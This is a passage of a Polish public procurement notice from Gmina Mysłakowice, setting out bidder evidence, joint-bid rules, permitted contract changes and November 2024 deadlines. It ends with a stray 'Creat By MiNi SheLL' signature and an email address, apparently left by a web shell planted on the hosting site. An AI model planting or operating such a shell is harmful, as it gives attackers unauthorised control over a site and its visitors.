charakterze i zakresie, posiadającą minimum średnie wykształcenie.<br/>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że posiada lub będzie posiadał przez cały okres trwania<br/>umowy biuro do kontaktu z Zamawiającym w odległości do 20 km od Gminy Mysłakowice, otwarte codziennie w dni robocze<br/>przez minimum 4 godziny dziennie, w przedziale godzin od 08:00 do 15:00. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie<br/>Wykonawcę, którego oferta zostanie najwyżej oceniona do złożenia w wyznaczonym terminie (nie dłuższym niż 5 dni od dnia<br/>wezwania) następujących podmiotowych środków dowodowych (aktualnych na dzień złożenia):<br/>2) w celu potwierdzenia braku podstaw do wykluczenia udziału w postępowaniu:<br/>a) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i<br/>opłat , w zakresie art. 109 ust. 1 pkt 1 ustawy PZP, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku<br/>zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem Zamawiający żąda złożenia dokumentów potwierdzających, że<br/>odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu<br/>składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące<br/>porozumienie w sprawie spłat tych należności,<br/>b) zaświadczenie lub inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego<br/>potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, w zakresie art. 109<br/>ust. 1 pkt 1 ustawy PZP, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem<br/>składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem lub innym dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w<br/>postępowaniu albo przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenie<br/>społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona do złożenia w wyznaczonym terminie (nie dłuższym<br/>niż 5 dni od dnia wezwania) następujących podmiotowych środków dowodowych (aktualnych na dzień złożenia):<br/>1) w celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a) wykaz wykonanych lub wykonywanych usług w zakresie niezbędnym do wykazania spełniania warunku zdolności technicznej lub<br/>zawodowej, wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, z podaniem ich wartości, przedmiotu, daty wykonania i odbiorców, oraz załączeniem<br/>dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie – załącznik nr 6 do SWZ,<br/>b) opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności<br/>cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (kserokopia potwierdzona za zgodność z<br/>oryginałem),<br/>c) wyliczenie kalkulacyjne kosztu (ceny) 1 godziny usługi opiekuńczej - załącznik nr 11a do SWZ,<br/>d) doświadczenie koordynatora – zgodnie z załącznikiem nr 11b do SWZ,<br/>e) oświadczenie o przynależności lub braku przynależności do grupy kapitałowej – załącznik nr 4 do SWZ,</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2 .Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania w postępowaniu i zawarciu umowy. Do oferty wspólnej Wykonawcy zobowiązani są<br/>dołączyć pełnomocnictwo zgodnie z załącznikiem nr 13 SWZ.<br/>3. Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje informacje,<br/>korespondencję, itp.<br/>4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1) oświadczenia, o których mowa w rozdziale VII SWZ, składa z ofertą każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu<br/>lub kryteriów selekcji, w jakim każdy z Wykonawców wykazuje spełnienie warunków udziału w postępowaniu lub kryteriów<br/>selekcji,<br/>2) dołączają do oferty oświadczenie, z którego wynika, które usługi wykonują poszczególni Wykonawcy. Oświadczenie<br/>należy złożyć zgodnie z załącznikiem nr 12 do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>5. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1 Zmiany umowy mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.<br/>2 Zmiany umowy nie mogą wykraczać poza zakres świadczenia usługi określony w SWZ.<br/>3 Wszelkie zmiany umowy możliwe są za obopólnym pisemnym porozumieniem stron w formie aneksu do umowy pod<br/>rygorem nieważności.<br/>4 Zamawiający dopuszcza możliwość zmiany umowy w zakresie:<br/>a) zmiany wysokości minimalnej stawki godzinowej – minimalnego wynagrodzenia ustalonego na podstawie przepisów o<br/>minimalnym wynagrodzeniu za pracę,<br/>b) zmiany zasad podlegania ubezpieczeniu społecznemu lub ubezpieczeniu zdrowotnemu lub zmiany wysokości składki na<br/>ubezpieczenie społeczne lub zdrowotne,<br/>c) jeżeli konieczność wprowadzenia zmian spowodowana jest zmianą powszechnie obowiązujących przepisów prawa, ze<br/>skutkiem z nich wynikającym,<br/>d) zmiany statusu podatkowego po stronie Zamawiającego w związku z podatkiem VAT, a w szczególności ze zmianą prawa<br/>lub orzecznictwem sądowym,<br/>e) zmiany wynagrodzenia w przypadku wprowadzenia lub ustawowej zmiany stawki podatku VAT (zwiększenie lub<br/>zmniejszenie). Przewiduje się możliwość zmiany umowy w zakresie zwiększenia lub zmniejszenia wynagrodzenia o różnicę<br/>między obowiązującą w dniu podpisania umowy stawką podatku VAT a ustawowo wprowadzoną stawką podatku VAT, z<br/>dniem jej wprowadzenia w życie.<br/>5 Nie stanowi zmiany umowy:<br/>a) utrata mocy aktów prawnych lub ich zmiana przywołanych w treści SWZ i umowie,<br/>b) zmiana danych związanych z obsługą administracyjno – organizacyjną umowy,<br/>c) zmiana nr rachunku bankowego,<br/>d) zmiana danych teleadresowych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-18 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-18 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com